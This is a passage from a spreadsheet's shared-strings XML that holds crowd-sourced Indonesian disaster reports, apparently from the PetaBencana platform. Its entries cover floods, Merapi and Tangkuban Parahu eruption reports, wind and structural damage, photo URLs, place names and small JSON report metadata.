    <t>Ruma di depan selokan. Alhamdulillah banjir selalu surut tidak lebih dari sehari.</t>
  </si>
  <si>
    <t>89c6e710-d89a-4284-8a55-1abc92690931</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89c6e710-d89a-4284-8a55-1abc92690931.jpg</t>
  </si>
  <si>
    <t>Banjir di Kampung Jawa Gg Flamboyan, Kec.Martapura, Kab.Banjar, Kalimantan Selatan</t>
  </si>
  <si>
    <t>c3fa767e-6f60-48e4-a11f-912916fa7b21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c3fa767e-6f60-48e4-a11f-912916fa7b21.jpg</t>
  </si>
  <si>
    <t>Daerah jl amd, tdk bgitu byk rmh. Tpi akses jln menuju banjar indah sgt susah, setidakny ad bantuan dr segi angkutan motor utk mlwti banjir</t>
  </si>
  <si>
    <t>Tanjung Pagar</t>
  </si>
  <si>
    <t>926ec6ec-6b55-4732-8991-8cd91b632c00</t>
  </si>
  <si>
    <t>{ "impact": 0, "points": 0, "report_type": "wind" }</t>
  </si>
  <si>
    <t>Vvv</t>
  </si>
  <si>
    <t>Poris Plawad Indah</t>
  </si>
  <si>
    <t>5caa18a1-157b-4216-8e87-14ba7b6d19c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5caa18a1-157b-4216-8e87-14ba7b6d19c0.jpg</t>
  </si>
  <si>
    <t>18bed17b-823f-4152-957c-d0adfeebf9e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/18bed17b-823f-4152-957c-d0adfeebf9e2.jpg</t>
  </si>
  <si>
    <t>Beberapa perkomplekan sudah dievakuasi namun masih banyak yang rumahnya tergenang air</t>
  </si>
  <si>
    <t>54023686-a41e-41b9-9ec2-8e60037d14e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/54023686-a41e-41b9-9ec2-8e60037d14e4.jpg</t>
  </si>
  <si>
    <t>F l o d</t>
  </si>
  <si>
    <t>cec2d0ef-7f6c-4e8e-aa60-fa34b4e09d48</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cec2d0ef-7f6c-4e8e-aa60-fa34b4e09d48.jpg</t>
  </si>
  <si>
    <t>Banjir di wilayah Kab. Hulu Sungai Tengah,Kal-Sel, terjadi pada kamis 14 Januari 2021. Banjir paling parah di Barabai"</t>
  </si>
  <si>
    <t>0494f21b-90f4-430c-9c0b-5bddfc6e7b8e</t>
  </si>
  <si>
    <t>di desa pucangro terdapat banjir jadi disana macet...</t>
  </si>
  <si>
    <t>521a3f76-df55-4b27-89e9-29205b8f2ee5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/521a3f76-df55-4b27-89e9-29205b8f2ee5.jpg</t>
  </si>
  <si>
    <t>Kedalaman air masih berubah rubah,, kemungkinan masih bertambah</t>
  </si>
  <si>
    <t>Mekar</t>
  </si>
  <si>
    <t>a0dcc024-e781-4421-b802-cd805ee02e17</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0dcc024-e781-4421-b802-cd805ee02e17.jpg</t>
  </si>
  <si>
    <t>Banjir diDusun sei biang Desa Bengkawa, Kecamatan Seluas, Kabupaten Bengkayang,Kalimantan Barat</t>
  </si>
  <si>
    <t>Bengkawan</t>
  </si>
  <si>
    <t>Seluas</t>
  </si>
  <si>
    <t>Bengkayang</t>
  </si>
  <si>
    <t>dbcba526-5837-4ae7-9dff-079637a2fe8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dbcba526-5837-4ae7-9dff-079637a2fe8e.jpg</t>
  </si>
  <si>
    <t>Banjir d sepanjang jalan ahmad yani</t>
  </si>
  <si>
    <t>f4b9d3b4-b3a2-4106-a263-898b8a2d1d6e</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "514", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Retak</t>
  </si>
  <si>
    <t>bbb49d32-cd47-4538-b523-85cf17d56e10</t>
  </si>
  <si>
    <t>Terdapat beberapa Desa di Kecamatan Malunda masih membutuhkan bantuan dan akses yang rusak parah, beberapa Desa seperti Desa Ulumanda</t>
  </si>
  <si>
    <t>Panggalo</t>
  </si>
  <si>
    <t>Ulumanda</t>
  </si>
  <si>
    <t>Majene</t>
  </si>
  <si>
    <t>f479b6ae-f826-4c3b-ad33-85653fe32a8b</t>
  </si>
  <si>
    <t>Malang Kota banjir</t>
  </si>
  <si>
    <t>Lowokwaru</t>
  </si>
  <si>
    <t>95b15390-8cb9-442a-8af6-b9e77801c9f8</t>
  </si>
  <si>
    <t>Banjir air pasang (ROB) di daerah Krapyak Pekalongan Utara Kota Pekalongan</t>
  </si>
  <si>
    <t>Krapyak Kidul</t>
  </si>
  <si>
    <t>b97d5577-9d30-4da4-967f-55ee742e24f8</t>
  </si>
  <si>
    <t>Banjir diakibatkan oleh selokan yang tersumbat dan hujan deras selama 5 jam</t>
  </si>
  <si>
    <t>Pocanan</t>
  </si>
  <si>
    <t>1629f52c-f36a-4f97-ab9e-b397995c70fa</t>
  </si>
  <si>
    <t>Banjir setinggi 5 cm,  diakibatkan oleh selokan yang tersumbat dan hujan deras selama 5 jam</t>
  </si>
  <si>
    <t>Bandar Lor</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2T0oDOdrbLbkElKMyafm9VEdqlAJUOYWZBRNJQiAEl02cz6mAcB0X1bkfzwG5W_yaFBmc2Qgvr8u_QOQGcIZbFxGyc_0Nk8K2tYdDgnu4w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "203", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>3f7d5aa4-b327-4df2-a383-4eda97c310b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f7d5aa4-b327-4df2-a383-4eda97c310b1.jpg</t>
  </si>
  <si>
    <t>Warga melintasi banjir di Desa Kampung Melayu, Kabupaten Banjar, Kalimantan Selatan, Jumat (15/1). Bencana banjir melanda beberapa kawasan</t>
  </si>
  <si>
    <t>a9c4e74d-e87d-42c0-a9dc-6bf158a4ace3</t>
  </si>
  <si>
    <t>volcano</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 3 ], "evacuationNumber": 3, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Tetap aman</t>
  </si>
  <si>
    <t>Kesatrian</t>
  </si>
  <si>
    <t>a9a5d82c-bd2d-446e-8379-922d6a35875b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9a5d82c-bd2d-446e-8379-922d6a35875b.jpg</t>
  </si>
  <si>
    <t>Banjir di salah satu desa di Pasuruan setinggi kira kira 1.5 meter hingga menghanguskan setidaknya 2 rumah warga dan jalan di sekitar rusak</t>
  </si>
  <si>
    <t>24a9aa0b-510d-4c58-90fa-c0b45fb1ec39</t>
  </si>
  <si>
    <t>https://images.petabencana.id/24a9aa0b-510d-4c58-90fa-c0b45fb1ec39.jpg</t>
  </si>
  <si>
    <t>Banjir di salah satu desa di Pasuruan setinggi 2 meter hingga menghanguskan setidaknya 2 rumah dan jalan di sekitar rusak parah</t>
  </si>
  <si>
    <t>Ringin Anom</t>
  </si>
  <si>
    <t>d34d45bc-918a-4d3e-b5a7-b203131c1a21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d34d45bc-918a-4d3e-b5a7-b203131c1a21.jpg</t>
  </si>
  <si>
    <t>Tidak aman</t>
  </si>
  <si>
    <t>53759451-50fa-4c4b-aa66-37a813ba8c0e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/53759451-50fa-4c4b-aa66-37a813ba8c0e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "260", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir terjadi di Ibu kota Jakarta,terjadi hari tanggal 25 November 2020 dengan tinggi 100cm. Ibu kota Jakarta terendam akibat hujan deras.</t>
  </si>
  <si>
    <t>9d75d0fe-58aa-40d2-ae37-a9a9990ad928</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d75d0fe-58aa-40d2-ae37-a9a9990ad928.jpg</t>
  </si>
  <si>
    <t>Desa Karang Bunga, Kec. Mandastana, Kab. Barito Kuala mengalami bencana kebanjiran.</t>
  </si>
  <si>
    <t>Karang Bunga</t>
  </si>
  <si>
    <t>Mandastana</t>
  </si>
  <si>
    <t>000d18b4-eb57-4814-9896-7881df11e13f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/000d18b4-eb57-4814-9896-7881df11e13f.jpg</t>
  </si>
  <si>
    <t>Banjir di sekitar sungai dan menyebabkan tanah longsor di griya sulfat sehingga menjadi laporan bahwa malang sedang mengalami cuaca ekstrim</t>
  </si>
  <si>
    <t>Sawojajar</t>
  </si>
  <si>
    <t>967fbfd7-d1f9-4874-ae86-64d5d2799d51</t>
  </si>
  <si>
    <t>https://images.petabencana.id/967fbfd7-d1f9-4874-ae86-64d5d2799d51.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 97, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sudah 1 bulan terjadi tetapi belum ada tanda-tanda surut, pemerintah daerah lamongan sangatlah lambat dalam menangani banjir</t>
  </si>
  <si>
    <t>Jelakcatur</t>
  </si>
  <si>
    <t>5b308ec0-1dc8-4326-a750-5594f140437f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5b308ec0-1dc8-4326-a750-5594f140437f.jpg</t>
  </si>
  <si>
    <t>Banjir masih belum surut hampir seminggu</t>
  </si>
  <si>
    <t>ce5f92eb-1f14-4d00-8858-3bf8a8c06789</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce5f92eb-1f14-4d00-8858-3bf8a8c06789.jpg</t>
  </si>
  <si>
    <t>Banjir yang melanda kota samarinda Kalimantan Timur pada (jumat 11 Januari 2021) dan beberapa kabupaten lainnya</t>
  </si>
  <si>
    <t>Mekar Baru</t>
  </si>
  <si>
    <t>Busang</t>
  </si>
  <si>
    <t>Kutai Timur</t>
  </si>
  <si>
    <t>bcef34dc-da56-41d1-9633-19557918a809</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bcef34dc-da56-41d1-9633-19557918a809.jpg</t>
  </si>
  <si>
    <t>92e59d15-0a40-4770-8450-2190afb966dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/92e59d15-0a40-4770-8450-2190afb966dc.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Semanga Kec Sejangkung Kab Sambas Kalbar, banjir sejak hari Sabtu 16 Januari 2021 sampai sekarang.</t>
  </si>
  <si>
    <t>Semanga</t>
  </si>
  <si>
    <t>Sejangkung</t>
  </si>
  <si>
    <t>Sambas</t>
  </si>
  <si>
    <t>eddf6b5c-69a7-4289-a475-0a8e88729751</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eddf6b5c-69a7-4289-a475-0a8e88729751.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Semanga Kec Sejangkung Kab Sambas,. Sejak Jumat 15 Januari 2021 s.d sekarang</t>
  </si>
  <si>
    <t>8107f566-a4ad-4cc8-a2b1-3c74deba64fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8107f566-a4ad-4cc8-a2b1-3c74deba64fa.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-PA" }</t>
  </si>
  <si>
    <t>Air meluap hingga merusak beberapa rumah dan fasilitas.</t>
  </si>
  <si>
    <t>Enarotali</t>
  </si>
  <si>
    <t>Paniai Timur</t>
  </si>
  <si>
    <t>Paniai</t>
  </si>
  <si>
    <t>Papua</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TKI12MPcIS5lbjA3fWN5SZEnkaDLGfVsoB81dk7KWfHBccpUWrPpxqlMSQUqoz3kbOhF_vkNvRHe40nFShLSzBXq5bFylErW62ERo6_mdQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1579", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>hujan sembentar aja langsung banjir.di karenakan saluran air sdh penuh dengan lumpur.trm ksh</t>
  </si>
  <si>
    <t>d88ec9c5-6e0c-444b-a3e9-3c95452deb18</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d88ec9c5-6e0c-444b-a3e9-3c95452deb18.jpg</t>
  </si>
  <si>
    <t>Banjir beserta tanah longsor</t>
  </si>
  <si>
    <t>Tungkaran</t>
  </si>
  <si>
    <t>c8e1ed2f-a8a5-4153-b3ac-8aa34722db49</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c8e1ed2f-a8a5-4153-b3ac-8aa34722db49.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 4, "condition": 2 }</t>
  </si>
  <si>
    <t>Semuanya hancur karena bencana ini</t>
  </si>
  <si>
    <t>Taman</t>
  </si>
  <si>
    <t>c949022a-ab0b-4e38-80c6-0edbf7ed477c</t>
  </si>
  <si>
    <t>Semua hancur karena bencana ini</t>
  </si>
  <si>
    <t>920f19b0-3f6e-4514-8d12-2c3473f5fa87</t>
  </si>
  <si>
    <t>https://images.petabencana.id/920f19b0-3f6e-4514-8d12-2c3473f5fa87.jpg</t>
  </si>
  <si>
    <t>Semua rata karena bencana ini</t>
  </si>
  <si>
    <t>96a8b9f1-5c3e-4a47-99e7-ee2b2f83d372</t>
  </si>
  <si>
    <t>Semua kendaraan gak bisa liwat</t>
  </si>
  <si>
    <t>a340c01c-b34a-43b2-aa6f-0d457d25e9ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a340c01c-b34a-43b2-aa6f-0d457d25e9ee.jpg</t>
  </si>
  <si>
    <t>Ada banjir besar !!!</t>
  </si>
  <si>
    <t>8b826c1c-b103-4956-a59f-a1a53ef65287</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b826c1c-b103-4956-a59f-a1a53ef65287.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 44, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Masih bisa dilewati</t>
  </si>
  <si>
    <t>533ef463-635c-431e-a808-52e912b561b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/533ef463-635c-431e-a808-52e912b561b4.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "volcano", "volcanicSigns": [ 0, 1, 3, 4, 2 ], "evacuationArea": true, "evacuationNumber": 2 }</t>
  </si>
  <si>
    <t>G. Tangkuban Parahu Erupsi, Asap dan Debu Vulcanik Mencapai 350 M, Masyarakat Sekitar Panik, Segera Harus Di evakuasi</t>
  </si>
  <si>
    <t>Cikahuripan</t>
  </si>
  <si>
    <t>Lembang</t>
  </si>
  <si>
    <t>Bandung Barat</t>
  </si>
  <si>
    <t>27c2878f-b690-41e1-9595-e34302820400</t>
  </si>
  <si>
    <t>{ "points": -1, "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>retakretak</t>
  </si>
  <si>
    <t>Sukapura</t>
  </si>
  <si>
    <t>Kiaracondong</t>
  </si>
  <si>
    <t>c052ad60-ce84-4655-b32a-b69a3c1b827d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c052ad60-ce84-4655-b32a-b69a3c1b827d.jpg</t>
  </si>
  <si>
    <t>Banjir bandang, berlokasi di enarotali,paniai, papua.</t>
  </si>
  <si>
    <t>e4dff13a-2873-4ed8-8bf9-1d1821c8c033</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4dff13a-2873-4ed8-8bf9-1d1821c8c033.jpg</t>
  </si>
  <si>
    <t>Pada hari Selasa tanggal 19 Januari 2021, Bencana Alam Banjir Bandang telah melanda di  Kp.Rawa Dulung RT 02/03 tugu Selatan, Cisarua, Bogor</t>
  </si>
  <si>
    <t>Cisarua</t>
  </si>
  <si>
    <t>f4998de4-3a58-44c2-9d94-d137b15118f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f4998de4-3a58-44c2-9d94-d137b15118f6.jpg</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa di Kelurahan Taas, Kecamatan Tikala, Kota Manado</t>
  </si>
  <si>
    <t>Taas</t>
  </si>
  <si>
    <t>Tikala</t>
  </si>
  <si>
    <t>5c6246ec-a973-4a6b-a765-dfc32712ddb2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c6246ec-a973-4a6b-a765-dfc32712ddb2.jpg</t>
  </si>
  <si>
    <t>Ranotana</t>
  </si>
  <si>
    <t>Sario</t>
  </si>
  <si>
    <t>af8fa79e-6c4b-4494-8d0c-ec1b7d82e5fb</t>
  </si>
  <si>
    <t>Sulit untuk di lewati kendaraan</t>
  </si>
  <si>
    <t>b75130aa-8c22-4a33-bef4-db779daeed3c</t>
  </si>
  <si>
    <t>Tidak terlalu tinggi dan masih bisa di lalui oleh kendaraan</t>
  </si>
  <si>
    <t>fcf95c28-f1cc-46e4-b853-0be54473e16e</t>
  </si>
  <si>
    <t>Tidak terlalu tinggi dan masih bisa di lewati kendaraan</t>
  </si>
  <si>
    <t>4eedd5fe-f56a-46e0-b939-68dca93ea69e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4eedd5fe-f56a-46e0-b939-68dca93ea69e.jpg</t>
  </si>
  <si>
    <t>Plafon runtuh,tembok terbelah,retak dimana mana,pondasi patah dan bergeser</t>
  </si>
  <si>
    <t>Simboro</t>
  </si>
  <si>
    <t>d28c0321-f472-4cfd-945c-a67c7600b0f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d28c0321-f472-4cfd-945c-a67c7600b0f2.jpg</t>
  </si>
  <si>
    <t>Tidak bisa dilewatii</t>
  </si>
  <si>
    <t>515df875-9507-4016-9332-39b085ad9101</t>
  </si>
  <si>
    <t>https://images.petabencana.id/515df875-9507-4016-9332-39b085ad9101.jpg</t>
  </si>
  <si>
    <t>Bencana banjir</t>
  </si>
  <si>
    <t>Sambiresik</t>
  </si>
  <si>
    <t>Gampengrejo</t>
  </si>
  <si>
    <t>00e13141-2581-4586-ad87-ec2780948123</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00e13141-2581-4586-ad87-ec2780948123.jpg</t>
  </si>
  <si>
    <t>Banjir rob yang sudah hampir dua minggu lebih tidak surut. Banjir berada di gang2 rumah warga di timur sungai.</t>
  </si>
  <si>
    <t>90cf03fb-5fd2-4657-832f-b7720c60c048</t>
  </si>
  <si>
    <t>Tidak terlalu tinggi</t>
  </si>
  <si>
    <t>8239b4d0-f312-45fe-a16d-8cf9af6945c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8239b4d0-f312-45fe-a16d-8cf9af6945c2.jpg</t>
  </si>
  <si>
    <t>Hujan lebat mengguyur desa kami sehingga banyak pohon yg tumbah dan jatuh menimpa rumah warga</t>
  </si>
  <si>
    <t>Pakuan Aji</t>
  </si>
  <si>
    <t>Sukadana</t>
  </si>
  <si>
    <t>Lampung Timur</t>
  </si>
  <si>
    <t>1227e510-be5f-4614-ac06-3f26ef04925b</t>
  </si>
  <si>
    <t>Banjir.,tidak bisa di lalui</t>
  </si>
  <si>
    <t>a9aee163-04d6-4d62-912a-9c0b8ba7c3e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9aee163-04d6-4d62-912a-9c0b8ba7c3e8.jpg</t>
  </si>
  <si>
    <t>Air mulai masuk ke dalam rumah warga, banjir semakin tinggi, hujan sudah mulai reda</t>
  </si>
  <si>
    <t>50d0f9de-b746-4073-8fb3-77f9def81605</t>
  </si>
  <si>
    <t>Banjir di bawah tol bintara sampai pertigaan arah kranji, kedalaman sampai lutut orang dewasa.</t>
  </si>
  <si>
    <t>6d5aae3a-103f-4d10-b49c-b77c6c78573c</t>
  </si>
  <si>
    <t>Banjir dari jam 8 pagi sampai jam setengah 11 siang baru mulai surut</t>
  </si>
  <si>
    <t>d31e339d-b123-430c-992c-17096904cd67</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d31e339d-b123-430c-992c-17096904cd67.jpg</t>
  </si>
  <si>
    <t>Banjir babakan rawa rt 08 rw 07 desa rancaekek kulon kec rancaekek banjir yg mengenangi babakan rawa karna tanggul jebol jadi sudah 3 hari</t>
  </si>
  <si>
    <t>Cileunyi Wetan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rcNpM1tpVE4uqEy8IDaPRTPES5jxuf2nD9L4ULyv4aifBeyr2BfaYj2fNgNfmC7KX_QklP61xU6wPAYXetDT5C3B4JhoeBtQYhCJMXNSfA=s480-c</t>
  </si>
  <si>
    <t>banjiirrr, loka permai cidodol keb lama jaksel</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VUZnJnCEQ74ddkLbBWrcWeT6vzaxq9Ufe3xELaBdmA4Nna40a-zAxC_poCzx16yRooGcEiDk5vhwMD1syGQ279hIesCOpWDtay7rILfiQA=s480-c</t>
  </si>
  <si>
    <t>banjir lagi di komplek loka permai #banjir</t>
  </si>
  <si>
    <t>132062d0-8269-4404-8da7-cd0cc2bc0624</t>
  </si>
  <si>
    <t>Banyak lubang</t>
  </si>
  <si>
    <t>Wangunharja</t>
  </si>
  <si>
    <t>c74dd1d1-ba8d-4a4e-b9cf-6f88736c99b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c74dd1d1-ba8d-4a4e-b9cf-6f88736c99b7.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationNumber": 2, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Erupsi Gunung Merapi, tampak awan panas yg cukup besar</t>
  </si>
  <si>
    <t>Kepuh Harjo</t>
  </si>
  <si>
    <t>Cangkringan</t>
  </si>
  <si>
    <t>1b434541-0e9d-4a7d-a839-ea18b33563b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1b434541-0e9d-4a7d-a839-ea18b33563b4.jpg</t>
  </si>
  <si>
    <t>Kenampakan erupsi Merapi dari wilayah Deles, Klaten. Warga tampak tenang, tidak ada hujan abu. Sumber foto: komunitas jalin Merapi</t>
  </si>
  <si>
    <t>Tegalmulyo</t>
  </si>
  <si>
    <t>Kemalang</t>
  </si>
  <si>
    <t>a1c80e18-609f-471f-a1d2-8ab7bdf6f95d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1c80e18-609f-471f-a1d2-8ab7bdf6f95d.jpg</t>
  </si>
  <si>
    <t>Genangan air di seputaran Pasar Kotabumi, Jalan RayaKutabumi, Tangerang.</t>
  </si>
  <si>
    <t>Kuta Bumi</t>
  </si>
  <si>
    <t>671b80a5-3cf4-4559-80dc-9d6452d0f29e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/671b80a5-3cf4-4559-80dc-9d6452d0f29e.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 3, 4 ], "evacuationNumber": 2, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Awanpanas guguran #Merapi tanggal 28 Januari 2021 pukul 10:13 WIB. Terpantau dari Deles, Klaten. Sumber foto: Badan Geologi.</t>
  </si>
  <si>
    <t>Sidorejo</t>
  </si>
  <si>
    <t>018257e1-cf23-4cdd-91ed-5b134c548a5f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/018257e1-cf23-4cdd-91ed-5b134c548a5f.jpg</t>
  </si>
  <si>
    <t>Daerah kawasan TPI Tawang Gempolsewu dan sekitarnya</t>
  </si>
  <si>
    <t>Gempolsewu</t>
  </si>
  <si>
    <t>Rowosari</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6VEqya0BjHbKcWJSWqdxDqA0qEPwDlOcqensNtxkTocB9o4g0bdZJp3zEaM6LeyKABPQC0K9NXyh9WSiA5Fg2DProPcHQMt5Jhl91R03gtk=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "211", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>lagi, banjir karena saluran air dibendung dekat sdn 04. mohon ditindaklanjuti kembali karena sudah sangat meresahkan warga rt 05/09 setiap hujan datang selalu was-was akan banjir. nb: saluran air yang sebelah kiri dibendung menggunakan batu kali dan gul"</t>
  </si>
  <si>
    <t>41377637-9b97-49b5-8045-ebcebfe2bf06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41377637-9b97-49b5-8045-ebcebfe2bf06.jpg</t>
  </si>
  <si>
    <t>Akibat curah hujan tinggi dan sungai Apur yang butuh normalisasi mengakibatkan sungai tak mampu menampung debit air yang begitu besar.</t>
  </si>
  <si>
    <t>Bandungrejo</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Vg0wRBTr8RgkevrXeDf4ugvlCriSjzGeXykt75F4bqA7pr1xBf3MHLbStdYsAYWuhlGqSHR8siWJWYB2qTSUBX3tmhpbNyqGNwlbGTEw=s480-c</t>
  </si>
  <si>
    <t>sekarang 15 menit langsung tinggi banjirnya, padahal lokasi kurang dr 1 km dr BKT, 2-3 thn lalu blm seperti ini, mudah2an pemda punya solusi.</t>
  </si>
  <si>
    <t>4a42047a-6b33-439d-b8aa-ad9af91d35fd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a42047a-6b33-439d-b8aa-ad9af91d35fd.jpg</t>
  </si>
  <si>
    <t>f15f5ce7-5dc5-44f4-8858-e8d3d7245953</t>
  </si>
  <si>
    <t>Angin kenvang</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357496</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/01/30/16119754591434446429.jpg</t>
  </si>
  <si>
    <t>Banjir Genangi Jalan Kincan Pondok Gede Pagi Ini</t>
  </si>
  <si>
    <t>Jalan Kincan, Pondok Gede terlihat tergenang air setinggi 10 cm pagi ini, Sabtu 30-01-2021.</t>
  </si>
  <si>
    <t>36052a6a-5491-45d5-a9d8-aba2e6e497b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36052a6a-5491-45d5-a9d8-aba2e6e497b8.jpg</t>
  </si>
  <si>
    <t>524d25ea-ea74-471a-96a3-d9b9d8728422</t>
  </si>
  <si>
    <t>https://images.petabencana.id/524d25ea-ea74-471a-96a3-d9b9d8728422.jpg</t>
  </si>
  <si>
    <t>pohon roboh disebabkan Oleh guncangan angin yang sangat keras</t>
  </si>
  <si>
    <t>Oro-Oro Ombo</t>
  </si>
  <si>
    <t>Batu</t>
  </si>
  <si>
    <t>3bdaa616-d723-4fbd-98cb-e574bcff436d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3bdaa616-d723-4fbd-98cb-e574bcff436d.jpg</t>
  </si>
  <si>
    <t>Dalam laporan terbaru yang dikeluarkan Posko Tanggap Darurat Bencana Gunung Merapi, warga Turgo Purwobinangun Pakem, Sleman telah dievakuasi</t>
  </si>
  <si>
    <t>Tamansari</t>
  </si>
  <si>
    <t>Licin</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qnB2snHJ3cztrOEkG19KkDOIyPkucFoc2YOgt2oGcbHPovRJIuG_8V3w_ksjdOKy7TJXrMukHGWv_kXC2dDmoBEYg0evGAZKzEZ9eIxq6g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "85", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong donk aparatur pemerintah di perhatikan genangan seperti ini..saya udh cape mengadu ke rt selalu di abaikan..rt 01 rw 05..trimakasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KPXPGgX-4_rvC7saCwhiZ3WmHus8wPgR7Qb_R-oH4LzDqKWC3nBMO0JPPUswX-cNNSqikpKntTXZyonLt-_NqyK8Ql4iaKkf1ojdl62nLQ=s480-c</t>
  </si>
  <si>
    <t>got sangat kecil dn banyak lumpur..tolong donk rt rw liat2 jngn telak pinggang saja..ini wabah bukan warterbum..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4tyAdP-iePFeMbR-Foa9dReaD7H6N5Lvcz_xD4MP3zQdekjBYvhaJBAIToJqgRh--bM25mZMVsJ1DMH2sMD1P2RyNZHrZl4xQY6L1tVY=s480-c</t>
  </si>
  <si>
    <t>harus mengadu kemana..rt rw selalu godek g ad tindakan apa2 dn g perna di perhatikan..ini air najis ujan g ujn selalu genang..semenjak ad pembangunan citra 8 rumah kami yg kena dampak ke banjiran trus rt dn rw g perna peduli dngn ad nya seperti ini..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3TC2WSY0j3AyOQl5MDkK3RI7UfGfaKh1f6xfaT3joqykE4clndLACDpUYzJz3rEV4sQ4jw1KZf42sVAvGlN5ChOlWIm53ZRmzxWXcJwjM5k=s480-c</t>
  </si>
  <si>
    <t>kami udh g bisa ngomong lg sama rt nya laporan kami selalu di abaikan oleh rt..alhamdulillah ada aplikasi ini kami bisa mengadu dn langsung di tindak..terimakasi pak gubernur#kalubisa air nya dipindain ke rt biar dia rasain sendiri #KaliMeluap</t>
  </si>
  <si>
    <t>0deaeecf-969d-496e-992d-74a63ea4dba2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0deaeecf-969d-496e-992d-74a63ea4dba2.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>Lari atau membantu</t>
  </si>
  <si>
    <t>5717fa70-7d9a-4c3e-93bc-1723f6d2024f</t>
  </si>
  <si>
    <t>Banjir Sungai Glugu dan sedikit mulai surut</t>
  </si>
  <si>
    <t>Kalongan</t>
  </si>
  <si>
    <t>Purwodadi</t>
  </si>
  <si>
    <t>ef3bcd86-22db-4116-9c40-4da74e5272b5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef3bcd86-22db-4116-9c40-4da74e5272b5.jpg</t>
  </si>
  <si>
